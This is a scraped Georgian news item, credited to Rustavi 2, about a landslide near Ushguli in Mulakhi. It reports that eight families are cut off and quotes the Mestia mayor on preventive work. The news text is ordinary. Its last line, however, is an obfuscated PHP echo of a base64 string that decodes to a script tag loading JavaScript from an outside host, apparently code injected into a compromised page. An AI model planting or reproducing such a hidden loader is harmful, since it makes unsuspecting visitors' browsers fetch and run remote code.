celsiusi
ავერსი შნაიდერი
ძლიერი წვიმის და თოვლის დნობის შედეგად, მულახში, უშგულთან მეწყერი ჩამოწვა. სტიქიის შედეგად 8 ოჯახი გარესამყაროს არის მოწყვეტილი. 
 
მესტიის მუნიციპალიტეტის მერის თქმით, სტიქიის ზონაში სპეცტექნიკა მუშაობს, რომ დასახლებულ ტერიტორიაზე ღვარცოფი არ შევარდეს.
 
"პრევენციული ღონისძიებები ტარდება მაგრამ გეოლოგები ჩამოვლენ ხვალ და დავგეგმავთ რა ღონისძიებები გატარდება. მოსახლეობის ევაკუაცია ჯერ არ იგეგმება, თუმცა ზოგიერთმა თავისი ინიციატივით დატოვა სტიქიის ზონა," - აცხადებს "რუსთავი 2-თან" მესტიის მუნიციპალიტეტის მერი კახა ჟორჟოლიანი.
 
წყარო: რუსთავი 2 
1266
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");